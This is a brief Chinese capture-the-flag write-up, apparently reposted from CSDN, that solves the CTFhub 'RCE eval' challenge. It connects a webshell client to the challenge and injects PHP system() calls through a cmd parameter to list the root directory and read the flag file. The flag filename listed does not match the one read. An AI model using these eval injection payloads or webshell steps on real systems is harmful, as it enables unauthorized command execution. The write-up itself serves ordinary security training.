CTFhub RCE eval

方法一:
可以用蚁剑直接连接webshell
cd /
find -name flag*//查找当前目录以及子目录下以flag开头的文件
方法二:【这里用post,用get也可以,毕竟是request记得加;】
在这里插入图片描述
cmd=system(“ls /”);
cmd=system(“cd /;ls”);
bin boot dev etc flag_31230 home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
cmd=system(“cd /;cat flag_31360”);
在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/luminous_you/article/details/110789460